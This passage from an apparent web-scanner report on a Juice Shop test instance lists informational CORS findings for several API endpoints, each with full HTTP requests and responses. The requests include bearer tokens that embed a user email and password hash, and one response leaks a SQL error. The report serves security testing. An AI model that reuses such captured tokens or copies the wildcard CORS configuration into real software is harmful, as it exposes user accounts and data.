ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:13:34 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...

2.3. http://192.168.61.143:3000/api/BasketItems/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/BasketItems/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://kpovdqsyjoyg.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

POST /api/BasketItems/ HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Content-Length: 43
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://kpovdqsyjoyg.com

{"ProductId":2,"BasketId":"4","quantity":1}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 256
ETag: W/"100-5U5m4WxHtD6uZu8lKlODTg"
Date: Sun, 15 Jan 2017 21:10:05 GMT
Connection: close

{"status":"error","message":{"errno":19,"code":"SQLITE_CONSTRAINT","sql":"INSERT INTO `BasketItems` (`id`,`quantity`,`createdAt`,`updatedAt`,`ProductId`,`BasketId`) VALUES (NULL,1,'2017-01-15 21:10:04
...[SNIP]...
2.4. http://192.168.61.143:3000/api/BasketItems/7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/BasketItems/7

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://cvzaxfhjshtt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/BasketItems/7 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://cvzaxfhjshtt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-gePwfRZF8T18+U2f4nstsg"
Date: Sun, 15 Jan 2017 21:11:03 GMT
Connection: close

{"status":"success","data":{}}
2.5. http://192.168.61.143:3000/api/BasketItems/8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/BasketItems/8

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://bujvpofahlcd.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/BasketItems/8 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://bujvpofahlcd.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-gePwfRZF8T18+U2f4nstsg"
Date: Sun, 15 Jan 2017 21:11:02 GMT
Connection: close

{"status":"success","data":{}}
2.6. http://192.168.61.143:3000/api/Complaints/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Complaints/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zqxglkuhoazq.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

POST /api/Complaints/ HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Content-Length: 36
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://zqxglkuhoazq.com

{"UserId":7,"message":"wewewewewew"}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 151
ETag: W/"97-LRazqPJy/BZ74C+QETMaqQ"
Date: Sun, 15 Jan 2017 21:10:15 GMT
Connection: close

{"status":"success","data":{"UserId":7,"message":"wewewewewew","id":579,"updatedAt":"2017-01-15T21:10:15.000Z","createdAt":"2017-01-15T21:10:15.000Z"}}
2.7. http://192.168.61.143:3000/api/Feedbacks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Feedbacks/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://iljjttmzqfex.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

POST /api/Feedbacks/ HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Content-Length: 42
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://iljjttmzqfex.com

{"UserId":7,"comment":"wewewe","rating":0}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 157
ETag: W/"9d-+5j396qlxJyImUci6wc37w"
Date: Sun, 15 Jan 2017 21:10:21 GMT
Connection: close

{"status":"success","data":{"UserId":7,"comment":"wewewe","rating":0,"id":594,"updatedAt":"2017-01-15T21:10:21.000Z","createdAt":"2017-01-15T21:10:21.000Z"}}
2.8. http://192.168.61.143:3000/api/Products/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/1

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://thjgmtviqahg.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/1?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://thjgmtviqahg.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 238
ETag: W/"ee-53rCFb8oFsZx9n/J7+mqUA"
Date: Sun, 15 Jan 2017 21:12:02 GMT
Connection: close

{"status":"success","data":{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"image":"apple_juice.jpg","createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"2017-0
...[SNIP]...
2.9. http://192.168.61.143:3000/api/Products/18

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/18

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://qzjiahqxybrt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/18?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://qzjiahqxybrt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 295
ETag: W/"127-PpZkvx2Uf2P7ykEwkJBylQ"
Date: Sun, 15 Jan 2017 21:12:02 GMT
Connection: close

{"status":"success","data":{"id":18,"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"image":"fruit_press.jpg","
...[SNIP]...
2.10. http://192.168.61.143:3000/api/Products/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/2

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://dkklryoaxfoj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/2?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://dkklryoaxfoj.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 268
ETag: W/"10c-hkD1i8LMM3pl/uHqcFZ3hw"
Date: Sun, 15 Jan 2017 21:12:02 GMT
Connection: close

{"status":"success","data":{"id":2,"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"image":"orange_juice.jpg","createdAt":"2017-01-15T20:5
...[SNIP]...
2.11. http://192.168.61.143:3000/api/Products/6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/6

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://paiwvnzrytjr.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/6?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://paiwvnzrytjr.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 244
ETag: W/"f4-TwNeU7jJ9LOASbCyrxRDhw"
Date: Sun, 15 Jan 2017 21:12:02 GMT
Connection: close

{"status":"success","data":{"id":6,"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"image":"banana_juice.jpg","createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"
...[SNIP]...
2.12. http://192.168.61.143:3000/api/Products/8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Products/8

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://lcjziiknfnqx.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /api/Products/8?d=Sun%20Jan%2015%202017 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
